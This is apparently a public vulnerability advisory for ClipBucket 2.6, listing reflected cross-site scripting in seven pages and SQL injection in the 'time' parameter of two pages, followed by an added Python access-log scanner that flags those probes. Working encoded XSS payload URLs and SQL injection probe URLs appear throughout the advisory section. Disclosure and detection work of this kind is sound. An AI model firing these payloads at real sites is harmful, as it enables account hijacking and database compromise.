Title: Multiple Vulnerabilities in ClipBucket 2.6
Author: YaDoY666
Vendor website:
Software: Clip Bucket (Open Source Video Sharing)
Affected version: 2.6
 
Cross Site Scripting
====================
 
- /[path]/channels.php
- /[path]/collections.php
- /[path]/groups.php
- /[path]/search_result.php
- /[path]/videos.php
- /[path]/view_collection.php
- /[path]/view_item.php
Examples (the payload is reflected through the `cat`, `query` and `type` parameters):
/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
 
SQL Injection
==============
 
- /[path]/channels.php
- /[path]/videos.php
 
Sample tests (a single quote appended to the `time` parameter):
/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
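As an added defensive example (not part of the advisory and not ClipBucket code), the following script scans web-server access-log lines for probes against the endpoints and parameters listed above; the log lines are constructed, and the install prefix "/clipbucket" is an assumption standing in for "[path]".

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Affected endpoints and parameters, taken from the advisory above.
XSS_PARAMS = {
    "/channels.php": {"cat"}, "/collections.php": {"cat"}, "/groups.php": {"cat"},
    "/search_result.php": {"query"}, "/videos.php": {"cat"},
    "/view_collection.php": {"type"}, "/view_item.php": {"type"},
}
SQLI_PARAMS = {"/channels.php": {"time"}, "/videos.php": {"time"}}

SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript:", re.IGNORECASE)
QUOTE_RE = re.compile(r"['\"]")
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (not from a real server); the requests
# mirror the advisory URLs, with "[path]" assumed to be "/clipbucket".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /clipbucket/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=all_time HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /clipbucket/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time HTTP/1.1" 200 4800
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /clipbucket/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 HTTP/1.1" 500 312
"""

def classify_request(url: str) -> list:
    """Return (kind, endpoint, param) findings for one request URL."""
    parts = urlsplit(url)
    endpoint = "/" + parts.path.rsplit("/", 1)[-1]  # drop the install prefix
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; catch double-encoding
            if name in XSS_PARAMS.get(endpoint, ()) and SCRIPT_RE.search(decoded):
                findings.append(("xss", endpoint, name))
            if name in SQLI_PARAMS.get(endpoint, ()) and QUOTE_RE.search(decoded):
                findings.append(("sqli", endpoint, name))
    return findings

def scan_log(text: str) -> list:
    """Scan access-log text; return (client_ip, kind, endpoint, param) per finding."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        for kind, endpoint, param in classify_request(m.group(1)):
            hits.append((ip, kind, endpoint, param))
    return hits
```

Calling scan_log(SAMPLE_LOG) returns one tuple for the XSS probe against channels.php and one for the SQL injection probe against videos.php, while the legitimate first request produces nothing.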